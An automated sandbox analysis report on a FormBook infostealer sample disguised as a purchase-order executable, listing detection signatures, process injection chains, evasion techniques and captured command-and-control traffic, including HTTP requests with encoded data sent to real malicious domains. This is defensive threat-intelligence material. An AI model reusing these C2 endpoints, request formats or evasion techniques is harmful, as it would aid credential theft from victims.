Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO #2411071822.exe

Overview

General Information

Sample name:PO #2411071822.exe
Analysis ID:1560695
MD5:564780e97b7357ca98fc62db3df63809
SHA1:cf356f775304d3bb066be358353ff1cc96689fd2
SHA256:14bc9f9cd6cfa43bf361789b26b16a95e6867c8bbd5bd78670b19da25bc729ef
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO #2411071822.exe (PID: 5008 cmdline: "C:\Users\user\Desktop\PO #2411071822.exe" MD5: 564780E97B7357CA98FC62DB3DF63809)
    • svchost.exe (PID: 6980 cmdline: "C:\Users\user\Desktop\PO #2411071822.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • olMdMEBIcgVB.exe (PID: 3752 cmdline: "C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • pcaui.exe (PID: 6468 cmdline: "C:\Windows\SysWOW64\pcaui.exe" MD5: A8F63C86DEF45A7E48E7F7DF158CFAA9)
          • olMdMEBIcgVB.exe (PID: 2128 cmdline: "C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2284 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.2470000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.2470000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO #2411071822.exe", CommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", ParentImage: C:\Users\user\Desktop\PO #2411071822.exe, ParentProcessId: 5008, ParentProcessName: PO #2411071822.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", ProcessId: 6980, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO #2411071822.exe", CommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", ParentImage: C:\Users\user\Desktop\PO #2411071822.exe, ParentProcessId: 5008, ParentProcessName: PO #2411071822.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", ProcessId: 6980, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.acond-22-mvr.click/w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ==Avira URL Cloud: Label: malware
                Source: http://www.acond-22-mvr.click/w9z4/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: PO #2411071822.exeReversingLabs: Detection: 36%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.2470000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3892013013.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3891999951.0000000003140000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2152486099.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: PO #2411071822.exeJoe Sandbox ML: detected
                Source: PO #2411071822.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: pcaui.pdb source: svchost.exe, 00000002.00000003.2120799220.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120686195.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000002.3891627012.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: olMdMEBIcgVB.exe, 00000003.00000000.2076602169.000000000017E000.00000002.00000001.01000000.00000004.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891157004.000000000017E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO #2411071822.exe, 00000000.00000003.2050855691.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, PO #2411071822.exe, 00000000.00000003.2053416861.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061214547.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2056215589.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2163003937.000000000521B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.000000000556E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2161107067.0000000005067000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO #2411071822.exe, 00000000.00000003.2050855691.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, PO #2411071822.exe, 00000000.00000003.2053416861.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2152067887.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061214547.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2056215589.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2163003937.000000000521B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.000000000556E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2161107067.0000000005067000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: pcaui.exe, 00000004.00000002.3892630131.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000002FEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2452781737.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: pcaui.exe, 00000004.00000002.3892630131.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000002FEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2452781737.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: pcaui.pdbGCTL source: svchost.exe, 00000002.00000003.2120799220.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120686195.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000002.3891627012.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00426CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00426CA9
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_004260DD
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_004263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_004263F9
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0042EB60
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042F56F FindFirstFileW,FindClose,0_2_0042F56F
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_0042F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0042F5FA
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00431B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431B2F
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00431C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431C8A
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00431F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00431F94

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: DNS query: www.54248711.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\PO #2411071822.exeCode function: 0_2_00434EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00434EB5
                Source: global trafficHTTP traffic detected: GET /7yx4/?jbeXk=EHbdQPuX&cla=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag== HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /klhq/?cla=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&jbeXk=EHbdQPuX HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ== HTTP/1.1Host: www.acond-22-mvr.clickAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /11t3/?cla=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013x4IWAXPzPql46H99XQd8N1WVXRvZaJo9RbMIS7VF6QhjMA==&jbeXk=EHbdQPuX HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /2pji/?cla=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==&jbeXk=EHbdQPuX HTTP/1.1Host: www.mrpokrovskii.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /egqi/?cla=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&jbeXk=EHbdQPuX HTTP/1.1Host: www.ytsd88.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /hyyd/?jbeXk=EHbdQPuX&cla=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA== HTTP/1.1Host: www.matteicapital.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /rsvy/?cla=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&jbeXk=EHbdQPuX HTTP/1.1Host: www.llljjjiii.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /huvt/?cla=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==&jbeXk=EHbdQPuX HTTP/1.1Host: www.ampsamkok88.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficHTTP traffic detected: GET /6gtt/?cla=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&jbeXk=EHbdQPuX HTTP/1.1Host: www.gogawithme.liveAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                Source: global trafficDNS traffic detected: DNS query: www.70kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.acond-22-mvr.click
                Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
                Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                Source: global trafficDNS traffic detected: DNS query: www.matteicapital.online
                Source: global trafficDNS traffic detected: DNS query: www.llljjjiii.shop
                Source: global trafficDNS traffic detected: DNS query: www.ampsamkok88.shop
                Source: global trafficDNS traffic detected: DNS query: www.gogawithme.live
                Source: global trafficDNS traffic detected: DNS query: www.54248711.xyz
                Source: unknownHTTP traffic detected: POST /klhq/ HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.70kdd.topCache-Control: max-age=0Content-Length: 204Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.70kdd.top/klhq/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)Data Raw: 63 6c 61 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 4c 46 4d 7a 71 53 38 62 36 45 71 67 62 71 59 68 4d 71 39 72 51 4a 47 65 42 72 6a 34 30 2b 78 58 33 6e 6a 2f 4a 67 3d Data Ascii: cla=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2cLFMzqS8b6EqgbqYhMq9rQJGeBrj40+xX3nj/Jg=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 22 Nov 2024 06:55:11 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
